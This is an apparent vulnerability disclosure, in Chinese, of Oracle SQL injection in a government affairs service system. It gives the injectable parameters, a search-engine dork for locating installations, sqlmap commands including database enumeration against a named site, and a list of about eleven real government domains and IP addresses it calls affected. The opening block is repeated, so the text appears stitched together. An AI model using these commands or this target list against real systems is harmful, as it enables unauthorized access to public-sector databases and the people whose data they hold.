VULHUB ™

### 简要描述： 某大型政府服务系统Oracle注入(使用量大) ### 详细说明： 问题厂商:深圳太极软件有限公司 一套专门的政务服务系统 用户量：大 影响：广 注入点 /researchinfo.do?method=queryinfo&id=1（id存注入） /researchinfo.do?method=querysx&deptid=1（deptid存注入） 证明： google关键字：inurl:bmtd.do? 漏洞证明： http://www.yjxzfw.com.cn/researchinfo.do?method=queryinfo&id=1 sqlmap.py -u "http://www.yjxzfw.com.cn/researchinfo.do?method=queryinfo&id=1" [<img src="https://images.seebug.org/upload/201501/042254248b8a96fea6e3caf2b0b72d202b06a63a.jpg" alt="1.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201501/042254248b8a96fea6e3caf2b0b72d202b06a63a.jpg) sqlmap.py -u "http://www.yjxzfw.com.cn/researchinfo.do?method=queryinfo&id=1" --dbs [<img src="https://images.seebug.org/upload/201501/04225446d51360d237b4fa3fc87d56c8bb164338.jpg" alt="2.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201501/04225446d51360d237b4fa3fc87d56c8bb164338.jpg) 漏洞案例：...

### 简要描述： 某大型政府服务系统Oracle注入(使用量大) ### 详细说明： 问题厂商:深圳太极软件有限公司 一套专门的政务服务系统 用户量：大 影响：广 注入点 /researchinfo.do?method=queryinfo&id=1（id存注入） /researchinfo.do?method=querysx&deptid=1（deptid存注入） 证明： google关键字：inurl:bmtd.do? 漏洞证明： http://www.yjxzfw.com.cn/researchinfo.do?method=queryinfo&id=1 sqlmap.py -u "http://www.yjxzfw.com.cn/researchinfo.do?method=queryinfo&id=1" [<img src="https://images.seebug.org/upload/201501/042254248b8a96fea6e3caf2b0b72d202b06a63a.jpg" alt="1.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201501/042254248b8a96fea6e3caf2b0b72d202b06a63a.jpg) sqlmap.py -u "http://www.yjxzfw.com.cn/researchinfo.do?method=queryinfo&id=1" --dbs [<img src="https://images.seebug.org/upload/201501/04225446d51360d237b4fa3fc87d56c8bb164338.jpg" alt="2.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201501/04225446d51360d237b4fa3fc87d56c8bb164338.jpg) 漏洞案例： http://www.yjxzfw.com.cn/researchinfo.do?method=queryinfo&id=1 http://www.gygxzw.gov.cn:8066/researchinfo.do?method=queryinfo&id=1 http://www.tlsp.net/researchinfo.do?method=queryinfo&id=1 http://58.42.249.116/researchinfo.do?method=queryinfo&id=1 http://218.201.232.67:8080/researchinfo.do?method=queryinfo&id=1 http://hxasc.cn/researchinfo.do?method=queryinfo&id=1 http://jjjc.sqxz.gov.cn/researchinfo.do?method=queryinfo&id=1 http://119.1.108.246/researchinfo.do?method=queryinfo&id=1 http://58.42.241.14:6778/researchinfo.do?method=queryinfo&id=1 http://www.sinanxzfw.gov.cn/researchinfo.do?method=queryinfo&id=1 http://jc.dlxg.gov.cn/researchinfo.do?method=queryinfo&id=1 ### 漏洞证明： sqlmap.py -u "http://www.yjxzfw.com.cn/researchinfo.do?method=queryinfo&id=1" --dbs [<img src="https://images.seebug.org/upload/201501/04225446d51360d237b4fa3fc87d56c8bb164338.jpg" alt="2.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201501/04225446d51360d237b4fa3fc87d56c8bb164338.jpg)